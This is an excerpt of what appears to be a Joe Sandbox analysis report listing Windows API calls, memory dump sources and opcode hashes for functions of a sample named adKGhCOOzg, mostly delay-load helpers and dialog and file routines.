                                    • API String ID: 1269201914-0
                                    • Opcode ID: c4608c141e142c9450f9a4c797568bd7e6f55f48675a556755ffde72e18c0c76
                                    • Instruction ID: 0fa1d7558c969adf4e42cf5dcd8c4f95cf88b177f0fadaed85931baa3a3db2b3
                                    • Opcode Fuzzy Hash: c4608c141e142c9450f9a4c797568bd7e6f55f48675a556755ffde72e18c0c76
                                    • Instruction Fuzzy Hash: 00B0129926C101AD312F6108BC02F77023CC0C7B12330C51AFD0DD4570D5805C0D4931
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: fe3a80fc13cc1b9463ea2691bdf4a6fff8e8ac1af5cc06467919d32904c6d1de
                                    • Instruction ID: 46549fbc83951dae432dc800f4f9bc1db5cd5532a34506e11c8a00b59d7825dd
                                    • Opcode Fuzzy Hash: fe3a80fc13cc1b9463ea2691bdf4a6fff8e8ac1af5cc06467919d32904c6d1de
                                    • Instruction Fuzzy Hash: 9BB0129927C201AD312F6108BC02F77023CC0C2B12330851BF90DD4970D5805C0C4931
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 7f6bf83a898f4337b6076eed1b5319a74dc2f0ed95bea24bc9fd38ba04f98c49
                                    • Instruction ID: 9021cfe8f4baf58ae9240774a9415a8427b1ebd32825ab4b71c8361e173cb8d1
                                    • Opcode Fuzzy Hash: 7f6bf83a898f4337b6076eed1b5319a74dc2f0ed95bea24bc9fd38ba04f98c49
                                    • Instruction Fuzzy Hash: CBA0029526D5417D717AB651ED16D7B425CD4D0B13330851AFC0A944595544584D5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: bebb26f0b1eab916030fd0f97b308887a429e10fb5efe028d35538ed58529226
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: bebb26f0b1eab916030fd0f97b308887a429e10fb5efe028d35538ed58529226
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 5100eb193a8e32dc88a471ebc8870601beaa6079f988118069340fa82a85435c
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: 5100eb193a8e32dc88a471ebc8870601beaa6079f988118069340fa82a85435c
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 121d06ed7a472fd3d55d63bb8ddd68029cdd1c24e1505a8d8f61594e6e358188
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: 121d06ed7a472fd3d55d63bb8ddd68029cdd1c24e1505a8d8f61594e6e358188
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 49ddfb5873ea9ee91676ab8b8b6d094e620282e5218200aae58ade727610ddf4
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: 49ddfb5873ea9ee91676ab8b8b6d094e620282e5218200aae58ade727610ddf4
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DAB2
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: fa29deb9658b4a86a54d53f002ead7d0dfd4a004dc424dd31d5c71939c46e6a7
                                    • Instruction ID: 630ad62e4b66fde7d1c6ebd43c454c84fc7d8d2e0eb34969351f6e60c4973eca
                                    • Opcode Fuzzy Hash: fa29deb9658b4a86a54d53f002ead7d0dfd4a004dc424dd31d5c71939c46e6a7
                                    • Instruction Fuzzy Hash: F0A0029516D142BD713A7651AD16D7B425CC4C4B52330851AFC0A944595544584D5831
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 1b26dda791632e08f0baad03c56ed6d37a6bf7bc01e5dc026344c5f83ce4129a
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: 1b26dda791632e08f0baad03c56ed6d37a6bf7bc01e5dc026344c5f83ce4129a
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: ae5995f81e3bf8dc93fd4cbcb3419f23ba245b44ccef03a8055aed791dc9a93d
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: ae5995f81e3bf8dc93fd4cbcb3419f23ba245b44ccef03a8055aed791dc9a93d
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                     • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: a15fbca64b7a354e64098a6e926cc1e57afff5953e8b7605fe35115ad52d99ad
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: a15fbca64b7a354e64098a6e926cc1e57afff5953e8b7605fe35115ad52d99ad
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DBD5
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: 2b96e7e06c7484fcf2bdbcc5e097387de5871e0a51b244742f6e6ff38eb8c966
                                    • Instruction ID: a340dc69826e03b6b643279df3e2d75e7e28c0f5a14e4c133f3a5beb0f9596d9
                                    • Opcode Fuzzy Hash: 2b96e7e06c7484fcf2bdbcc5e097387de5871e0a51b244742f6e6ff38eb8c966
                                    • Instruction Fuzzy Hash: ABA0129526C003BC302A11007C07D76022CC0C0B123308409F80A8456059400C0C4430
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: e01a6a9a385310ca3299ea98815b44213098f2229114d324d3095b073c4b9258
                                    • Instruction ID: 062267180570b5c379e8d68da049b29b6435c859ebdab8c6b0c25b65e39ebb8c
                                    • Opcode Fuzzy Hash: e01a6a9a385310ca3299ea98815b44213098f2229114d324d3095b073c4b9258
                                    • Instruction Fuzzy Hash: 94A0129516C102BC302E21007C02E76022CC0C0B123308809F80A9447095801C0C4430
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035DC36
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID:
                                    • API String ID: 1269201914-0
                                    • Opcode ID: bd9d80bdb56c0967a1af997d8055154eb3038507e911249f865584153c2e2758
                                    • Instruction ID: 062267180570b5c379e8d68da049b29b6435c859ebdab8c6b0c25b65e39ebb8c
                                    • Opcode Fuzzy Hash: bd9d80bdb56c0967a1af997d8055154eb3038507e911249f865584153c2e2758
                                    • Instruction Fuzzy Hash: 94A0129516C102BC302E21007C02E76022CC0C0B123308809F80A9447095801C0C4430
                                    APIs
                                    • SetEndOfFile.KERNELBASE(?,00349104,?,?,-00001964), ref: 00349EC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File
                                    • String ID:
                                    • API String ID: 749574446-0
                                    • Opcode ID: a8d92271048d023f311cc37ec897be709b53625e2e25f1590ce3963f2075ef64
                                    • Instruction ID: b10285269d6d22fca2d67a48db57422f0c8e19e01039d2b67ddb90f7926aa5de
                                    • Opcode Fuzzy Hash: a8d92271048d023f311cc37ec897be709b53625e2e25f1590ce3963f2075ef64
                                    • Instruction Fuzzy Hash: 42B012700A0005468E112B30CC048143A14FA1130670041606007C5060DB12C0026600
                                    APIs
                                    • SetCurrentDirectoryW.KERNELBASE(?,0035A587,C:\Users\user\Desktop,00000000,0038946A,00000006), ref: 0035A326
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory
                                    • String ID:
                                    • API String ID: 1611563598-0
                                    • Opcode ID: d0161c32feed2b7043f55e38d7a074d00590da3744040cd3b125ec442b3c7891
                                    • Instruction ID: 3d767b371c116e5914448343f2fa81dc2a66ed9564b6a310495aca12c6d58ebb
                                    • Opcode Fuzzy Hash: d0161c32feed2b7043f55e38d7a074d00590da3744040cd3b125ec442b3c7891
                                    • Instruction Fuzzy Hash: C1A01230194006568A111B30CC09C1577545760702F0086207006C00A0CB308854B501
                                    APIs
                                    • CloseHandle.KERNELBASE(000000FF,?,?,0034968F,?,?,?,?,00371FA1,000000FF), ref: 003496EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 7c6fd3d5c4d029ddd69dadf9a0ce13cce383824638401821ca6dc2033b3907f2
                                    • Instruction ID: df6e03f343dbcbfd730c2f6d33a88c64d7c09c78abe4dae84d710354db2d4b06
                                    • Opcode Fuzzy Hash: 7c6fd3d5c4d029ddd69dadf9a0ce13cce383824638401821ca6dc2033b3907f2
                                    • Instruction Fuzzy Hash: F0F0BE30046B008FDB328A20C549793B7E89B12335F058B1F80EB0B5A49764788D8B00
                                    APIs
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0035B971
                                    • EndDialog.USER32(?,00000006), ref: 0035B984
                                    • GetDlgItem.USER32(?,0000006C), ref: 0035B9A0
                                    • SetFocus.USER32(00000000), ref: 0035B9A7
                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0035B9E1
                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0035BA18
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0035BA2E
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0035BA4C
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0035BA5C
                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0035BA78
                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0035BA94
                                    • _swprintf.LIBCMT ref: 0035BAC4
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0035BAD7
